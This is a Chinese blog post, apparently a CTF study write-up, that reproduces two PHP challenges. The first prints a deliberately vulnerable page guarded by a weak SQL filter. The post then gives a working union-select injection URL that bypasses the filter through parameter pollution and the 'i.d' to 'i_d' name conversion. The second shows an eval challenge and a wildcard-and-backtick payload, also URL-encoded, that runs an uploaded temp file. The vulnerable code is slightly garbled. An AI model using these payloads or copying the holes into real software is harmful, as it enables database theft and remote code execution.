渗透学习之漏洞复现

Zombie_QP2024-08-12 9:36

漏洞

贷齐乐的漏洞复现

php 复制代码 
<?php
header("Content-type: text/html; charset=utf-8");
require 'db.inc.php';
  function dhtmlspecialchars($string) {
      if (is_array($string)) {
          foreach ($string as $key => $val) {
              $string[$key] = dhtmlspecialchars($val);
          }
      }
      else {
          $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
          if (strpos($string, '&amp;#') !== false) {
              $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
          }
      }
      return $string;
  }
  function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }
/
  }
  // 经过第二个WAF处理
  $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  //i_d=1&i.d=aaaaa&submit=1
  if (isset($request_uri[1])) {
      $rewrite_url = explode("&", $request_uri[1]);
      //print_r($rewrite_url);exit;
      foreach ($rewrite_url as $key => $value) {
          $_value = explode("=", $value);
          if (isset($_value[1])) {
              //$_REQUEST[I_d]=-1 union select flag users
              $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
          }
      }
  }
  if (isset($_REQUEST['submit'])) {
      $user_id = $_REQUEST['i_d'];
      $sql = "select * from ctf.users where id=$user_id";
      $result=mysqli_query($sql);
      while($row = mysqli_fetch_array($result))
      {
          echo "<tr>";
          echo "<td>" . $row['name'] . "</td>";
          echo "</tr>";
      }
  }
?>

过滤的关键就在于这个:

php 复制代码 
preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);

1)hpp全局污染,php接受相同参数。取后者

2)i.d在php中$_REQUEST,自动转为i_d,而 $request_uri 接收i.d就是i.d

3)注入绕过 =(like) 单引号(十六进制) 空格(/**/)

第二个Wuf的绕过:

php 复制代码 
http://127.0.0.1/daiqile/index.php?submit=aaaaaaa&i_d=-1/**/union/**/select/**/1,schema_name,3/**/from/**/information_schema.schemata/**/limit/**/0,1&i.d=1

RCE

php 复制代码 
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

查看源代码后,发现有防范,那么应该如何去绕过呢?

php 复制代码 
 if(strlen($code)>35   
 if(preg_match("/[A-Za-z0-9_$]+/",$code)){

这里的两条限制了长度,限制了字母和数字

这里我们运用临时文件去做一个绕过,编写一个HTML文件

然后咋们去进行burpsuit抓包,将抓到的包放入repeater里面

然后就是最重要的一点,就是看我最上面的红框,写入绕过代码:

php 复制代码 
?code=?><?=`.+/???/????????[@-[]`;?>

这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码

转换成编码应该是这个:

php 复制代码 
3F%3E%3C%3F%3D%60%2E%2B%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40%2D%5B%5D%60%3B%3F%3E

最后就实现了

相关推荐
jerry20110812 分钟前
AI学习笔记
学习
文人sec30 分钟前
泷羽sec学习打卡-Windows基础命令
android·网络·windows·学习·安全·web安全
向上的车轮30 分钟前
ODOO学习笔记(4):Odoo与SAP的主要区别是什么?
笔记·学习·sap·odoo
single59442 分钟前
c++学习:封装继承多态
开发语言·c++·git·vscode·学习
大飞攻城狮1 小时前
如果你没有必须要离职的原因,我建议你在忍忍
人工智能·学习·大模型·大模型学习·大模型入门·大模型教程
scc21402 小时前
Spark的学习-02
大数据·学习·spark
且随疾风前行.2 小时前
Android JNI 技术入门指南
android
Winston Wood2 小时前
Android中桌面小部件framework层使用到的设计模式
android·设计模式
汤姆和佩琦2 小时前
24-11-9-读书笔记(三十二)-《契诃夫文集》(六)上([俄] 契诃夫 [译] 汝龙)药品是甜的,真理是美的,咖啡是苦的,生活是什么啊?
笔记·学习·生活·短篇小说·契诃夫·俄国文学
Kalika0-03 小时前
bert-base-uncased使用
人工智能·深度学习·学习·自然语言处理·bert
热门推荐
01Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO02【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)05基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测06Windows10安装PCL1.14.0及点云配准07Unity中PICO实现 隔空取物 和 接触抓取物体08RAG 实践- Ollama+RagFlow 部署本地知识库09Coze扣子平台完整体验和实践(附国内和国际版对比)10苹果safari浏览器播放不了video标签视频